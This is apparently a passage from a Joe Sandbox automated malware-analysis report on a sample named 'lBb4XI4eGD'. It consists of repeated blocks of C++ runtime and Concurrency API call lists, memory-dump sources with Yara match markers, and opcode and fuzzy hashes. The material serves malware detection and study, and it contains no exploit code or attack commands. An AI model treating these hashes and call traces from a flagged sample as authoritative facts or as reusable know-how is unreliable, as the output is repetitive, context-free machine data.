                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                                                • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                • Instruction ID: 0dde809cff85efe1a06f082dffa05588a2f4c4b6f5b2494ffdd5bda6add1d188
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3401FC36615322AFC7214F69AC449A77B98AF89FA1F241531F905D7240D724E90186E8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0216639F
                                                                                                                                                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021663B3
                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021663CB
                                                                                                                                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021663E3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 78362717-0
                                                                                                                                                                                                                                • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                • Instruction ID: c0fca1fca1c115f0260bddd81fd28447fa9ba29aff6f22f4415ebe57972eff90
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A01D632640524BBDF15AE999848EBF779E9F95350F050055EC39A7281DB74ED208AA0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 02162BA1
                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02162BBF
                                                                                                                                                                                                                                  • Part of subcall function 02158677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02158698
                                                                                                                                                                                                                                  • Part of subcall function 02158677: Hash.LIBCMT ref: 021586D8
                                                                                                                                                                                                                                • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02162BC8
                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02162BE8
                                                                                                                                                                                                                                  • Part of subcall function 0215F6CF: Hash.LIBCMT ref: 0215F6E1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2250070497-0
                                                                                                                                                                                                                                • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                • Instruction ID: f2cd319e4ad14fdaa0a5ed481ca70f9ad7e1fc72e0e3bbe18e8ce96f1eccaf72
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B118E76400600EFC715DFA4C880EDAF7F9EF19310F004A5EE95687551DB70E914CBA0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426138
                                                                                                                                                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042614C
                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426164
                                                                                                                                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042617C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 78362717-0
                                                                                                                                                                                                                                • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                • Instruction ID: ba6f451568feed0ad97d4c35bc03da7052fef1102373e57c37541bd94dea7e10
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD01F236700224A7CF16AE5AA811AFFB7A99F80354F41005BFC11A7282DE24FD2192A8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 02162BA1
                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02162BBF
                                                                                                                                                                                                                                  • Part of subcall function 02158677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02158698
                                                                                                                                                                                                                                  • Part of subcall function 02158677: Hash.LIBCMT ref: 021586D8
                                                                                                                                                                                                                                • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02162BC8
                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02162BE8
                                                                                                                                                                                                                                  • Part of subcall function 0215F6CF: Hash.LIBCMT ref: 0215F6E1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2250070497-0
                                                                                                                                                                                                                                • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                • Instruction ID: 0086f198146b170cafaef0807674ee85dada57b5b5b0d22e0303f65898ffe218
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1015772400604AFC724EFA5C880EDAF7E9EF48310B008A1EA96687250DB70F954CBA0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 021450C7
                                                                                                                                                                                                                                  • Part of subcall function 0214BDA4: __EH_prolog3_GS.LIBCMT ref: 0214BDAB
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 02145112
                                                                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 02145121
                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02145131
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1836011271-0
                                                                                                                                                                                                                                • Opcode ID: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                                                                                                                                                                                • Instruction ID: 867b375ad4875d1f434e141d17d08b5a841bbe362be0e8a856846fea7bbef2c2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8018871981308EFEB10EFA4C490B9CBBB2BF54714F10812AD05DAB281CFB99A44CF91
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 02145B83
                                                                                                                                                                                                                                  • Part of subcall function 0214BDA4: __EH_prolog3_GS.LIBCMT ref: 0214BDAB
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 02145BCE
                                                                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 02145BDD
                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02145BED
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1836011271-0
                                                                                                                                                                                                                                • Opcode ID: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                                                                                                                                                                                • Instruction ID: 6f3f5c87ca174083557905fb4ecf8708343cc96ebc3072a3552074bb96d2da83
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC019A72981309EFEB14EFA4C450B9CBBB2BF18315F10802AD00DAB280CFB99944CF90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040591C
                                                                                                                                                                                                                                  • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405967
                                                                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 00405976
                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405986
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1836011271-0
                                                                                                                                                                                                                                • Opcode ID: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                                                                                                                                                                                • Instruction ID: 7de8e0425e838f52bf763386e227ca4e4c8dd97e461cbe55c35c0d0d082d521b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61011771910209DFDB10EFA5C486B9DB7B0EF04329F10843EE459BB681DB789549CF99
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0215C160
                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0215C170
                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0215C180
                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0215C194
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3973403980-0
                                                                                                                                                                                                                                • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                • Instruction ID: 52985f6c30814ffc38ff261fce0363ebd00f6e6e82c62767c6533c29cd340bdc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7101BB7A584369FBCF129F54DC818AE3B66AB55354F0484A3FD3884070D732C671ABD1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BEF9
                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF2D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3973403980-0
                                                                                                                                                                                                                                • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                • Instruction ID: 54cf5004022dc03f320fac5c152f4f5b0e5638c7bf5de93af177e0e0418c077f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1901FB3744418DBBDF119E64DD428EE3B66EF08354B148516F918C4235C336CAB2EF89
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0215377C
                                                                                                                                                                                                                                  • Part of subcall function 02152B06: ___crtGetTimeFormatEx.LIBCMT ref: 02152B1C
                                                                                                                                                                                                                                  • Part of subcall function 02152B06: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02152B3B
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02153798
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021537AE
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 021537BC
                                                                                                                                                                                                                                  • Part of subcall function 021528DC: SetThreadPriority.KERNEL32(?,?), ref: 021528E8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1674182817-0
                                                                                                                                                                                                                                • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                • Instruction ID: f40c16f4cb0007c60c6fa020bd2d73bf45341be414b90f141e63bd1e3d36a3f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F0A7B3980335BDE730B7755C0AFBB369C9B01750F5009A6BD25E7080EBA9D4448AB4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02151332
                                                                                                                                                                                                                                  • Part of subcall function 02150BA4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02150BC6
                                                                                                                                                                                                                                  • Part of subcall function 02150BA4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02150BE7
                                                                                                                                                                                                                                • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02151345
                                                                                                                                                                                                                                • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02151351
                                                                                                                                                                                                                                • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0215135A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4284812201-0
                                                                                                                                                                                                                                • Opcode ID: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                                                                                                                                                • Instruction ID: 7840e036248b845906d2d66becaef27d0b1ea4ff9578ab4b4656917b839fe708
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05F090216C0724FF9F65BBB448A06AE22974F89320B4441A99D355B7C0DF658D01DA95
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110CB
                                                                                                                                                                                                                                  • Part of subcall function 0041093D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041095F
                                                                                                                                                                                                                                  • Part of subcall function 0041093D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410980
                                                                                                                                                                                                                                • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110DE
                                                                                                                                                                                                                                • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110EA
                                                                                                                                                                                                                                • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004110F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4284812201-0
                                                                                                                                                                                                                                • Opcode ID: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                                                                                                                                                                                • Instruction ID: f673f10ca75d55ca35707f3ec936348daa0dfd556a05ba3ac72040e7cf752ef9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EF02470A002046BDF347BB648525EE35954F85318F04403FBA12AB7D1DEBC9DC6939D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413515
                                                                                                                                                                                                                                  • Part of subcall function 0041289F: ___crtGetTimeFormatEx.LIBCMT ref: 004128B5
                                                                                                                                                                                                                                  • Part of subcall function 0041289F: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128D4
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00413531
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413547
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00413555
                                                                                                                                                                                                                                  • Part of subcall function 00412675: SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1674182817-0
                                                                                                                                                                                                                                • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                • Instruction ID: 0599dc728a4d66ec5529e5430020c2b67b59d3184165c4d7970fdf63fa2ec416
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AF08271A002253AD724BA765D07FFB369C9B01B54F90095BB905E6186F9ECD99042AC
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0215D078
                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0215D09C
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0215D0AF
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0215D0BD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3657713681-0
                                                                                                                                                                                                                                • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                                • Instruction ID: 3c66a0a7c57d1ebd94ec538464f4f0418b82f7d801ae293bf525888ab2e11678
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBF05931980224EBC724FB10F840C6EB37F8ED0B1576181AADC2513181DB31A94ACB92
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 02145A79
                                                                                                                                                                                                                                • __Cnd_signal.LIBCPMT ref: 02145A85
                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 02145A9A
                                                                                                                                                                                                                                • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02145AA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2059591211-0
                                                                                                                                                                                                                                • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                                • Instruction ID: 1d1323fa0d31e84d0b46d22917085c837316560e9355ec33dc7f84c6a928fc54
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FF0A032480701AFEB307B71D80672A77A2AF01729F144819D05D56990CF7AA8554E65
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 0215285F
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,02158820,?,?,?,?,00000000,?,00000000), ref: 0215286E
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02152884
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02152892
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3803302727-0
                                                                                                                                                                                                                                • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                • Instruction ID: 6577b6c8fbfe0b57ea12ec18375201b21a24bdd9d8579cba8c15e117ca03bdab
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF0A03554021AFBCF10EFE4DD44EAF37A8AB00B01F600660B920E20A0DB78D6049BA4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 004125F8
